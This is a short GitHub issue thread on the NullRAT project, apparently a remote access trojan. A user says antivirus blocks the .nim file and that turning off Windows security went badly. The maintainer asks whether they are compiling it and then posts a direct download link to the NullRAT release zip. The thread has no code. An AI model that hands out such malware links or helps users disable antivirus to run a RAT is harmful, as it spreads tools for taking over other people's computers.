### ISSUE TITLE
My dumb brain...

### ISSUE THREAD

**Issue by MikeKamara** [NullCode13/NullRAT#73]
It appears that I'm encountering difficulties accessing the .NIM file due to a virus detection warning. Regrettably, my previous attempt to resolve this by disabling the Windows security system resulted in unforeseen consequences 💀.

**Comment by NullCode1337** [comment]
> It appears that I'm encountering difficulties accessing the .NIM file due to a virus detection warning. Regrettably, my previous attempt to resolve this by disabling the Windows security system resulted in unforeseen consequences 💀.

are you trying to compile nullrat?
if not, get the latest zip from Releases, otherwise I would like to know what "accessing the .nim file" means :)

**Comment by NullCode1337** [comment]
hi. no updates??
here's the download link for latest atp if you were wondering 
[https://github.com/NullCode1337/NullRAT/releases/download/XH1/NullRAT.zip](https://github.com/NullCode1337/NullRAT/releases/download/XH1/NullRAT.zip)
